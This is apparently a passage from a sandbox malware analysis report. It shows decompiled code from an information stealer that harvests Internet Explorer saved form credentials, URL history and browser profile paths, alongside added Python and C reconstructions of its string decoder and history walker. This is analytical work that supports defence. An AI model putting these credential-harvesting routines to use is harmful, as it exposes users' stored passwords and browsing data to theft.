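The inner do/while above (the one that computes `_t13[_t114] ^ _t132 ^ 0x13`) walks a table of length-prefixed blocks: for each block it allocates `length` bytes via `E0BC08D51`, XORs every byte with its own index and the constant 0x13 into that buffer, stores the buffer pointer in the `_v460` array, then advances by `length + 4` until it meets a zero length. The Python below is an added re-implementation of that logic as read from the decompiler output; it is not code from the sample or from this report. It assumes the length prefix is a little-endian 32-bit value (consistent with the x86 code), that `E0BC08D51` simply allocates `length` bytes, and that the store is byte-wide; the input blob is constructed here for the demonstration, not recovered from the sample.

```python
import struct

XOR_CONST = 0x13  # constant from the decompiled loop: byte ^ index ^ 0x13


def decode_block(payload: bytes) -> bytes:
    """Undo the per-byte transform: out[i] = in[i] ^ (i ^ 0x13), byte-wide.

    The loop counter is a 32-bit register but the result is stored as a byte,
    so only the low byte of (i ^ 0x13) matters (assumption: byte-wide store).
    """
    return bytes(b ^ ((i ^ XOR_CONST) & 0xFF) for i, b in enumerate(payload))


def decode_blob(blob: bytes) -> list:
    """Walk the length-prefixed table the way the decompiled outer loop does.

    Layout (assumed little-endian): a DWORD length, `length` encoded bytes,
    then the next block; a zero length terminates the table.  The original
    code advances by `*src + 4` with no bounds check and only skips the XOR
    loop when the length compares as <= 0 (signed); here a truncated or
    negative length raises instead of reading out of bounds.
    """
    out = []
    off = 0
    while True:
        if off + 4 > len(blob):
            raise ValueError(f"truncated length prefix at offset {off:#x}")
        (length,) = struct.unpack_from("<i", blob, off)
        if length == 0:
            break  # terminator
        if length < 0:
            raise ValueError(f"negative length {length} at offset {off:#x}")
        start, end = off + 4, off + 4 + length
        if end > len(blob):
            raise ValueError(f"block at offset {off:#x} runs past end of data")
        out.append(decode_block(blob[start:end]))
        off = end
    return out


def encode_blob(strings: list) -> bytes:
    """Inverse of decode_blob, used only to build test data (XOR is its own inverse)."""
    body = b"".join(struct.pack("<I", len(s)) + decode_block(s) for s in strings)
    return body + struct.pack("<I", 0)


# Constructed sample input (not taken from the sample): three plaintext entries
# packed into the length-prefixed, XOR-encoded table format.
SAMPLE_STRINGS = [b"first entry", b"second entry", b"third"]
SAMPLE_BLOB = encode_blob(SAMPLE_STRINGS)

if __name__ == "__main__":
    for index, entry in enumerate(decode_blob(SAMPLE_BLOB)):
        print(index, entry)
```

To apply this to the real sample, dump the memory region that `_t134` points at when `E0BC01153`'s caller enters this loop (the `_v460` array receives one pointer per decoded block) and pass the raw bytes to `decode_blob`; the per-index key means the same plaintext byte encodes differently at each position, so a plain single-byte XOR scan will not recover these strings.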
Address column for the decompiled code above: per-line instruction addresses in the range 0x0bc01153 to 0x0bc01430; the column's alignment with the individual code lines was lost in extraction.
                                                                                                                                        0x0bc011db
                                                                                                                                        0x0bc011db
                                                                                                                                        0x0bc01206
                                                                                                                                        0x0bc0120c
                                                                                                                                        0x0bc01213
                                                                                                                                        0x0bc01217
                                                                                                                                        0x0bc01217
                                                                                                                                        0x0bc0121b
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc011c8

APIs
• WSAStartup.WS2_32(00000101,?), ref: 0BC01183
• LocalAlloc.KERNEL32(00000040,0000008C), ref: 0BC01190
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,00000000,00000030), ref: 0BC0122F
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0BC01245
• GetHGlobalFromStream.OLE32(?,?), ref: 0BC012C4
• GlobalLock.KERNEL32 ref: 0BC012E5
• GlobalUnlock.KERNEL32(?), ref: 0BC01361
  • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
• Sleep.KERNEL32(00002EE0), ref: 0BC013E4
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: Global$Stream$AllocCreateLocal$FromLockSleepStartupUnlock
• String ID:
• API String ID: 2557352088-0
• Opcode ID: 460a0b16ac82c8c7f1245bca46fe7b9bce1ad4b23e7bc2ed571e016a80971f02
• Instruction ID: f16a690f29ca53b84f21dc68e901550b1024aed9d7e5b94ec533e1cc3ed213b2
• Opcode Fuzzy Hash: 460a0b16ac82c8c7f1245bca46fe7b9bce1ad4b23e7bc2ed571e016a80971f02
• Instruction Fuzzy Hash: 8F813E71A222299FDF209F64CC85ADAB7B5BF06304F5845EAE249B7190DB709F80CF51
Uniqueness
• Uniqueness Score: 1.44%

C-Code - Quality: 47%
// Decompiler output (Joe Sandbox IDA plugin). Comments added by the editor describe
// what the visible calls and the listed subcalls do; unresolved temporaries (_t49,
// _t53, _t59, _t82, _t42, _t24) are left as the decompiler emitted them.
// Summary: walks a registry key recursively (_a8 = root handle, _a12 = subkey path)
// and, for every key whose path contains the search string _a16, resolves the
// "PathToExe" entry and hands the resulting directory to an INI-parsing routine.
E0BC0689E(void* __edx, intOrPtr _a4, void* _a8, char* _a12, char* _a16, intOrPtr _a20) {
	intOrPtr _v12;
	void* _v16;
	char _v20;
	char _v24;
	void* _v28;
	long _t36;
	void* _t37;
	long _t39;
	char _t48;
	void* _t51;
	void* _t68;
	signed int _t76;
	void* _t78;

	_t68 = __edx;
	_t78 = (_t76 & 0xfffffff8) - 0x14;
	// case-insensitive substring test: does this key path contain the search string?
	if(StrStrIA(_a12, _a16) != 0) {
		// helper (body not shown) that looks up the "PathToExe" entry under this key
		_t48 = E0BC08EBD(_a8, _a12, "PathToExe", 0); // executed
		_t78 = _t78 + 0xc;
		_v20 = _t48;
		if(_t48 != 0) {
			// 0BC0914B: lstrlenA / StrStrIA(".exe") / StrRChrIA('\\') per the subcall list,
			// i.e. strips the executable name to obtain its directory
			_t59 = E0BC0914B(_t48);
			if(_t49 != 0) {
				// 0BC091BE: SHGetFolderPathA with CSIDL 0x1a (CSIDL_APPDATA) per the subcall list
				_t51 = E0BC091BE(0x1a);
				_t82 = _t51;
				if(_t51 != 0) {
					// 0BC08F32: lstrcpyA + lstrcatA, i.e. string concatenation
					E0BC08F32(_t51, _a20);
					// 0BC06713: GetPrivateProfileSectionNamesA / StrStrIA("Profile") /
					// GetPrivateProfileStringA("Path"), i.e. parses an INI file found there
					E0BC06713(_t68, _t82, _a4, _t53, _t59); // executed
					_t78 = _t78 + 0x14;
					E0BC08D3D(_t53); // release helper
				}
				E0BC08D3D(_t59);
			}
			E0BC08D3D(_v20);
		}
	}
	// enumerate subkeys and recurse into each one
	_v28 = LocalAlloc(0x40, 0x880);
	_t36 = RegOpenKeyA(_a8, _a12,  &_v16); // executed
	if(_t36 != 0) {
		L12:
		_t37 = E0BC08D3D(_v28); // executed
		return _t37;
	} else {
		_push(0);
		_push(0);
		_push(0);
		_push(0);
		_push( &_v24);
		_push(_v28);
		_v20 = 0; // subkey index
		_push(0);
		while(1) {
			_v24 = 0x7ff; // name buffer size for RegEnumKeyExA
			_t39 = RegEnumKeyExA(_v16, ??, ??, ??, ??, ??, ??, ??); // executed
			if(_t39 != 0) {
				break;
			}
			// build "<_a12>\<subkey>" and recurse with the same root handle and search string
			_v12 = E0BC08F32(E0BC08EE2("\\", _a12), _v28);
			E0BC0689E(_t68, _a4, _a8, _t42, _a16, _a20); // executed
			_t78 = _t78 + 0x1c;
			E0BC08D3D(_v12);
			_t24 =  &_v20;
			 *_t24 = _v20 + 1;
			__eflags =  *_t24;
			_push(0);
			_push(0);
			_push(0);
			_push(0);
			_push( &_v24);
			_push(_v28);
			_push(_v20);
		}
		RegCloseKey(_v16); // executed
		goto L12;
	}
}


APIs
• StrStrIA.SHLWAPI(?,?), ref: 0BC068B0
• LocalAlloc.KERNEL32(00000040,00000880), ref: 0BC06928
• RegOpenKeyA.ADVAPI32(?,?,?), ref: 0BC0693D
• RegEnumKeyExA.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC069C2
• RegCloseKey.KERNELBASE(?), ref: 0BC069CC
  • Part of subcall function 0BC0914B: lstrlenA.KERNEL32(0BC068DE,00000000,?,?,?,0BC068DE,00000000), ref: 0BC0916A
  • Part of subcall function 0BC0914B: StrStrIA.SHLWAPI(00000000,.exe,?,?,?,0BC068DE,00000000), ref: 0BC0918A
  • Part of subcall function 0BC0914B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,?,?,?,0BC068DE,00000000), ref: 0BC0919D
  • Part of subcall function 0BC0914B: lstrlenA.KERNEL32(00000000,?,?,?,0BC068DE,00000000), ref: 0BC091AE
  • Part of subcall function 0BC091BE: LocalAlloc.KERNEL32(00000040,00000185,?,?,0BC02182,?), ref: 0BC091C9
  • Part of subcall function 0BC091BE: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,00000000,?,?,0BC02182,?), ref: 0BC091DA
  • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
  • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
  • Part of subcall function 0BC08F32: lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
  • Part of subcall function 0BC08F32: lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
  • Part of subcall function 0BC06713: LocalAlloc.KERNEL32(00000040,00000000), ref: 0BC06777
  • Part of subcall function 0BC06713: LocalAlloc.KERNEL32(00000040,00001080), ref: 0BC06785
  • Part of subcall function 0BC06713: GetPrivateProfileSectionNamesA.KERNEL32 ref: 0BC067A2
  • Part of subcall function 0BC06713: StrStrIA.SHLWAPI(00000000,Profile), ref: 0BC067C2
  • Part of subcall function 0BC06713: GetPrivateProfileStringA.KERNEL32(00000000,Path,0BC0D832,00000000,00000FFF,?), ref: 0BC067E4
                                                                                                                                          • Part of subcall function 0BC06713: GetPrivateProfileIntA.KERNEL32 ref: 0BC067F9
                                                                                                                                          • Part of subcall function 0BC06713: lstrlenA.KERNEL32(00000000), ref: 0BC06852
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Locallstrlen$Alloc$PrivateProfile$CloseEnumFolderFreeNamesOpenPathSectionStringlstrcatlstrcpy
                                                                                                                                        • String ID: PathToExe
                                                                                                                                        • API String ID: 4124449509-1982016430
                                                                                                                                        • Opcode ID: 5bf0cb48004fd6f865b04010372cf64a9541a5146cfd492789393de75e961b9d
                                                                                                                                        • Instruction ID: 991c5fbaeedf826f1d0af9ab6c45de8c888106bbb348f22a7b2e8e01520bea13
                                                                                                                                        • Opcode Fuzzy Hash: 5bf0cb48004fd6f865b04010372cf64a9541a5146cfd492789393de75e961b9d
                                                                                                                                        • Instruction Fuzzy Hash: 59318D72538205BFDB016F64DC05C6B7FA9FF88650F108A29FA54950A0EE31CA20ABA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 45%
                                                                                                                                        			E0BC0509B(intOrPtr _a4) {
                                                                                                                                        				void* _v12;
                                                                                                                                        				void* _v16;
                                                                                                                                        				void* _v20;
                                                                                                                                        				WCHAR* _v52;
                                                                                                                                        				WCHAR* _v56;
                                                                                                                                        				char _v60;
                                                                                                                                        				void* __esi;
                                                                                                                                        				char* _t27;
                                                                                                                                        				void* _t28;
                                                                                                                                        				intOrPtr* _t29;
                                                                                                                                        				intOrPtr* _t31;
                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                        				intOrPtr* _t35;
                                                                                                                                        				WCHAR* _t37;
                                                                                                                                        				intOrPtr* _t53;
                                                                                                                                        
                                                                                                                                        				_t27 =  &_v20;
                                                                                                                                        				__imp__CoCreateInstance(0xbc0c1e0, 0, 0x15, 0xbc0c1f0, _t27); // executed
                                                                                                                                        				if(_t27 < 0) {
                                                                                                                                        					L14:
                                                                                                                                        					_t28 = E0BC04E17(_t51, L"http://www.facebook.com/", __eflags, _a4, 0); // executed
                                                                                                                                        					return _t28;
                                                                                                                                        				}
                                                                                                                                        				_t29 = _v20;
                                                                                                                                        				_t51 =  &_v12;
                                                                                                                                        				_push( &_v12);
                                                                                                                                        				_push(_t29);
                                                                                                                                        				if( *((intOrPtr*)( *_t29 + 0x1c))() < 0 || _v12 == 0) {
                                                                                                                                        					L13:
                                                                                                                                        					_t31 = _v20;
                                                                                                                                        					 *((intOrPtr*)( *_t31 + 8))(_t31);
                                                                                                                                        					goto L14;
                                                                                                                                        				} else {
                                                                                                                                        					_t53 = __imp__CoTaskMemFree;
                                                                                                                                        					_v56 = 0;
                                                                                                                                        					_v52 = 0;
                                                                                                                                        					_v60 = 0x28;
                                                                                                                                        					while(1) {
                                                                                                                                        						_t33 = _v12;
                                                                                                                                        						_push( &_v16);
                                                                                                                                        						_t51 =  &_v60;
                                                                                                                                        						_push( &_v60);
                                                                                                                                        						_push(1);
                                                                                                                                        						_v16 = 0;
                                                                                                                                        						_push(_t33); // executed
                                                                                                                                        						if( *((intOrPtr*)( *_t33 + 0xc))() != 0 || _v16 != 1) {
                                                                                                                                        							break;
                                                                                                                                        						}
                                                                                                                                        						if(_v56 != 0) {
                                                                                                                                        							_t37 = StrStrIW(_v56, "?");
                                                                                                                                        							_t62 = _t37;
                                                                                                                                        							if(_t37 == 0) {
                                                                                                                                        								_t37 = 0;
                                                                                                                                        								__eflags = 0;
                                                                                                                                        							} else {
                                                                                                                                        								 *_t37 = 0;
                                                                                                                                        							}
                                                                                                                                        							E0BC04E17(_t51, _v56, _t62, _a4, _t37); // executed
                                                                                                                                        							 *_t53(_v56);
                                                                                                                                        							if(_v52 != 0) {
                                                                                                                                        								 *_t53(_v52);
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					_t35 = _v12;
                                                                                                                                        					 *((intOrPtr*)( *_t35 + 8))(_t35);
                                                                                                                                        					goto L13;
                                                                                                                                        				}
                                                                                                                                         			}

                                                                                                                                        APIs
                                                                                                                                        • CoCreateInstance.OLE32(0BC0C1E0,00000000,00000015,0BC0C1F0,?), ref: 0BC050B7
                                                                                                                                        • StrStrIW.SHLWAPI(?,0BC0D72C), ref: 0BC0511F
                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0BC05143
                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0BC0514D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeTask$CreateInstance
                                                                                                                                        • String ID: ($http://www.facebook.com/
                                                                                                                                        • API String ID: 2903366249-3677894361
                                                                                                                                        • Opcode ID: 383ea2a17596b780223de14db633a8604017054f35dc1742f2e5cbce355e105b
                                                                                                                                        • Instruction ID: c807bb11b329e4628daca6c599042251ebad5a074d7dde13ad85a8fa200e5a82
                                                                                                                                        • Opcode Fuzzy Hash: 383ea2a17596b780223de14db633a8604017054f35dc1742f2e5cbce355e105b
                                                                                                                                        • Instruction Fuzzy Hash: E5314876A20219EFDF009FE4DCC59AEBBB9FF44745F108469F501A7290DA719A41CF10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%
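Readable reconstruction of E0BC0509B above, added here as an example; it is not code from the sample or from Joe Sandbox. The dump shows the pattern but not the GUIDs at 0BC0C1E0/0BC0C1F0: the vtable slots it calls (offset 0x1c on the created object, 0xc on the enumerator, 8 for Release), the 0x28-byte record whose first two pointer fields are released with CoTaskMemFree, and the report's own "Creates a COM Internet Explorer object" signature are consistent with IUrlHistoryStg::EnumUrls walking an IEnumSTATURL over STATURL records, so that identification is an inference. The names walk_url_history, split_query and url_handler_t are mine; the handler stands in for E0BC04E17, which the dump calls once per history URL truncated at the first '?' and, on every path (L14 is reached after the loop as well as on failure), finally with the hardcoded http://www.facebook.com/. The COM walk is Windows-only; the query split is portable so it can be exercised anywhere.

```c
/* Added reconstruction of E0BC0509B (not the sample's or Joe Sandbox's code).
 * COM plumbing is Windows-only; split_query is portable. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <wchar.h>

#ifdef _WIN32
#include <windows.h>
#include <urlhist.h>   /* IUrlHistoryStg, IEnumSTATURL, STATURL: inferred identification */
#pragma comment(lib, "ole32.lib")
#pragma comment(lib, "uuid.lib")
#endif

/* Stand-in for E0BC04E17 (hypothetical name): gets the URL with its query
 * string cut off, the cut position (NULL when there was none) and a context. */
typedef void (*url_handler_t)(const wchar_t *url, const wchar_t *cut, void *ctx);

/* Mirrors: _t37 = StrStrIW(url, L"?"); if (_t37) *_t37 = 0; E0BC04E17(.., url, .., _t37)
 * Truncates url in place at the first '?' and returns the cut position (the
 * query text starts at cut + 1), or NULL when the URL had no query string. */
const wchar_t *split_query(wchar_t *url)
{
    wchar_t *q = wcschr(url, L'?');
    if (q == NULL)
        return NULL;
    *q = L'\0';
    return q;
}

#ifdef _WIN32
/* Control flow of E0BC0509B. Caller must have initialised COM. Returns the
 * number of history entries handed to handler, or -1 when the history object
 * could not be created. The hardcoded facebook.com URL goes to handler last
 * in every case, as the dump reaches L14 on both the success and failure paths. */
int walk_url_history(url_handler_t handler, void *ctx)
{
    IUrlHistoryStg *hist = NULL;
    IEnumSTATURL *en = NULL;
    STATURL st;
    ULONG fetched;
    int count = -1;

    /* CoCreateInstance(clsid@0BC0C1E0, 0, 0x15, iid@0BC0C1F0, &_v20); 0x15 == CLSCTX_SERVER */
    if (SUCCEEDED(CoCreateInstance(&CLSID_CUrlHistory, NULL, CLSCTX_SERVER,
                                   &IID_IUrlHistoryStg, (void **)&hist))) {
        count = 0;
        /* vtable offset 0x1c == slot 7 of IUrlHistoryStg == EnumUrls */
        if (SUCCEEDED(hist->lpVtbl->EnumUrls(hist, &en)) && en != NULL) {
            memset(&st, 0, sizeof st);
            st.cbSize = sizeof st;              /* 0x28 on x86: the _v60 = 0x28 in the dump */
            for (;;) {
                fetched = 0;
                /* vtable offset 0xc == slot 3 of IEnumSTATURL == Next(1, &st, &fetched) */
                if (en->lpVtbl->Next(en, 1, &st, &fetched) != S_OK || fetched != 1)
                    break;
                if (st.pwcsUrl != NULL) {
                    const wchar_t *cut = split_query(st.pwcsUrl);
                    handler(st.pwcsUrl, cut, ctx);
                    count++;
                    CoTaskMemFree(st.pwcsUrl);  /* the two CoTaskMemFree calls in the APIs list */
                    if (st.pwcsTitle != NULL)
                        CoTaskMemFree(st.pwcsTitle);
                }
            }
            en->lpVtbl->Release(en);            /* offset 8 == Release */
        }
        hist->lpVtbl->Release(hist);
    }
    handler(L"http://www.facebook.com/", NULL, ctx);   /* L14 */
    return count;
}

static void print_url(const wchar_t *url, const wchar_t *cut, void *ctx)
{
    (void)ctx;
    wprintf(L"%ls%ls\n", url, cut ? L"  [query stripped]" : L"");
}

int main(void)
{
    int n = -1;
    if (SUCCEEDED(CoInitializeEx(NULL, COINIT_APARTMENTTHREADED))) {
        n = walk_url_history(print_url, NULL);
        CoUninitialize();
    }
    return n < 0;
}
#endif
```

Built on Windows against ole32 and uuid, this prints the same URL list the sample would feed to E0BC04E17, which is useful when checking what a stealer on a given host would have seen. Note the ordering the dump fixes: the facebook.com call happens after the loop and on the failure path alike, so observing only that URL at E0BC04E17 does not by itself show that the history walk failed.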

                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                        			E0BC04E17(void* __edx, WCHAR* __esi, void* __eflags, intOrPtr _a4, short* _a8) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				char _v76;
                                                                                                                                        				char _v80;
                                                                                                                                        				char* _v84;
                                                                                                                                        				signed int _v88;
                                                                                                                                        				char _v92;
                                                                                                                                        				char* _v96;
                                                                                                                                        				short* _v100;
                                                                                                                                        				intOrPtr _v104;
                                                                                                                                        				WCHAR* _v108;
                                                                                                                                        				char _v112;
                                                                                                                                        				intOrPtr _v116;
                                                                                                                                        				char _v120;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				signed int _t39;
                                                                                                                                        				intOrPtr _t52;
                                                                                                                                        				int _t56;
                                                                                                                                        				short* _t63;
                                                                                                                                        				char* _t69;
                                                                                                                                        				void* _t70;
                                                                                                                                        				void* _t77;
                                                                                                                                        				char* _t79;
                                                                                                                                        				WCHAR* _t80;
                                                                                                                                        				signed int _t81;
                                                                                                                                        				void* _t82;
                                                                                                                                        				void* _t83;
                                                                                                                                        
                                                                                                                                        				_t80 = __esi;
                                                                                                                                        				_t77 = __edx;
                                                                                                                                        				_t39 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_v8 = _t39 ^ _t81;
                                                                                                                                        				_v104 = _a4;
                                                                                                                                        				_v100 = _a8;
                                                                                                                                        				_t79 = E0BC088C9("6ulekscV\\JbDggHg\\Xv3Db 6HRRLQ5g\\6v2R9DpH\\TL3pvgv2R\\kLQEv9g\\JAppHQRaHpgLvQ\\s44JvQRDLQHp\\6RvpD5H\\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\\TL3pvgv2RVE5H\\1QRHbbLlvpOg\\lvpOoDRD");
                                                                                                                                        				_v96 = _t79;
                                                                                                                                        				_v84 = _t79;
                                                                                                                                        				if(_t79 == 0) {
                                                                                                                                        					_v84 = " ";
                                                                                                                                        				}
                                                                                                                                        				_t70 = lstrlenW;
                                                                                                                                        				if(lstrlenW(_t80) + _t44 + 2 != 0) {
                                                                                                                                        					E0BC08D5E( &_v76,  &_v76, 0, 0x40);
                                                                                                                                        					E0BC04F4F(_t80, _t77,  &_v76);
                                                                                                                                        					_t52 = E0BC08DDA(_t80,  *0xbc10010, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2",  &_v76,  &_v80, 0); // executed
                                                                                                                                        					_t79 = _t52;
                                                                                                                                        					_t83 = _t82 + 0x18;
                                                                                                                                        					if(_t79 != 0) {
                                                                                                                                        						L6:
                                                                                                                                        						if(_v80 != 0) {
                                                                                                                                        							_t56 = lstrlenW(_t80);
                                                                                                                                        							_v88 = _v88 & 0x00000000;
                                                                                                                                        							_v112 = _t56 + _t56 + 2;
                                                                                                                                        							_v120 = _v80;
                                                                                                                                        							_v108 = _t80;
                                                                                                                                        							_v116 = _t79;
                                                                                                                                        							if(E0BC01000( &_v120,  &_v112,  &_v92) != 0 && _v88 != 0) {
                                                                                                                                        								_t63 = _v100;
                                                                                                                                        								if(_t63 != 0) {
                                                                                                                                        									 *_t63 = "?";
                                                                                                                                        								}
                                                                                                                                        								E0BC04B07(_v104, _t80, _v88, _v92);
                                                                                                                                        								LocalFree(_v88);
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        						E0BC08D3D(_t79);
                                                                                                                                        						L13:
                                                                                                                                        						_push(_v96);
                                                                                                                                        						goto L14;
                                                                                                                                        					}
                                                                                                                                        					_t69 = E0BC08DDA(_t80,  *0xbc10010, _v84,  &_v76,  &_v80, _t52); // executed
                                                                                                                                        					_t79 = _t69;
                                                                                                                                        					_t83 = _t83 + 0x14;
                                                                                                                                        					if(_t79 == 0) {
                                                                                                                                        						goto L13;
                                                                                                                                        					}
                                                                                                                                        					goto L6;
                                                                                                                                        				} else {
                                                                                                                                        					_push(_t79);
                                                                                                                                        					L14:
                                                                                                                                        					return E0BC09FDC(LocalFree(), _t70, _v8 ^ _t81, _t77, _t79, _t80);
                                                                                                                                        				}
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC088C9: lstrlenA.KERNEL32(6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD), ref: 0BC0894B
                                                                                                                                          • Part of subcall function 0BC088C9: LocalAlloc.KERNEL32(00000040,-00000004), ref: 0BC08957
                                                                                                                                          • Part of subcall function 0BC088C9: lstrcpyA.KERNEL32(00000000,6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD), ref: 0BC08961
                                                                                                                                        • lstrlenW.KERNEL32 ref: 0BC04E59
                                                                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000040), ref: 0BC04F3B
                                                                                                                                          • Part of subcall function 0BC04F4F: lstrlenW.KERNEL32(?,00000000,?,74F469A0), ref: 0BC04F71
                                                                                                                                          • Part of subcall function 0BC04F4F: wsprintfA.USER32 ref: 0BC0503F
                                                                                                                                          • Part of subcall function 0BC04F4F: lstrcpyA.KERNEL32(?,?), ref: 0BC05051
                                                                                                                                          • Part of subcall function 0BC04F4F: wsprintfA.USER32 ref: 0BC05078
                                                                                                                                          • Part of subcall function 0BC04F4F: lstrcpyA.KERNEL32(?,?), ref: 0BC0508A
                                                                                                                                          • Part of subcall function 0BC08DDA: RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,HWID,?,HWID,?,?), ref: 0BC08E1A
                                                                                                                                          • Part of subcall function 0BC08DDA: RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000), ref: 0BC08E3B
                                                                                                                                          • Part of subcall function 0BC08DDA: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?), ref: 0BC08E69
                                                                                                                                          • Part of subcall function 0BC08DDA: RegCloseKey.KERNELBASE(?), ref: 0BC08E8C
                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000000,00000040), ref: 0BC04ECB
                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000040), ref: 0BC04F2B
                                                                                                                                        Strings
                                                                                                                                        • 6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD, xrefs: 0BC04E32
                                                                                                                                        • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0BC04E8B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Locallstrcpy$FreeQueryValuewsprintf$AllocCloseOpen
                                                                                                                                        • String ID: 6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                                                                                        • API String ID: 3202864287-1265371777
                                                                                                                                        • Opcode ID: 476e2ceca82c10ed8769472db2478b20d1fbea6b7c5f472f94a05d32e32a9c86
                                                                                                                                        • Instruction ID: c4470f76749939fc406a64f556f456e5db7058246c2dfa0166ce647b2181e5ae
                                                                                                                                        • Opcode Fuzzy Hash: 476e2ceca82c10ed8769472db2478b20d1fbea6b7c5f472f94a05d32e32a9c86
                                                                                                                                        • Instruction Fuzzy Hash: 7B412572D21208AFCB05DBE4C841ADEBBF9AF48340F10412AE615EB294EF749A05DB60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.34%

                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                        			E0BC08DDA(void* __esi, void* _a4, char* _a8, char* _a12, intOrPtr* _a16, int _a20) {
                                                                                                                                        				int* _v8;
                                                                                                                                        				void* _v12;
                                                                                                                                        				int _v16;
                                                                                                                                        				intOrPtr* _t29;
                                                                                                                                        				int _t30;
                                                                                                                                        				long _t31;
                                                                                                                                        				int* _t33;
                                                                                                                                        				long _t36;
                                                                                                                                        				int _t38;
                                                                                                                                        				char* _t40;
                                                                                                                                        				long _t41;
                                                                                                                                        				intOrPtr* _t42;
                                                                                                                                        				int _t44;
                                                                                                                                        				void* _t51;
                                                                                                                                        
                                                                                                                                        				_t51 = __esi;
                                                                                                                                        				_t29 = _a16;
                                                                                                                                        				_v8 = 0;
                                                                                                                                        				if(_t29 != 0) {
                                                                                                                                        					 *_t29 = 0;
                                                                                                                                        				}
                                                                                                                                        				_t44 = _a20;
                                                                                                                                        				_t30 = 0x20019;
                                                                                                                                        				if(_t44 != 1) {
                                                                                                                                        					if(_t44 == 2) {
                                                                                                                                        						_t30 = 0x20119;
                    }
                } else {
                    _t30 = 0x20219;
                }
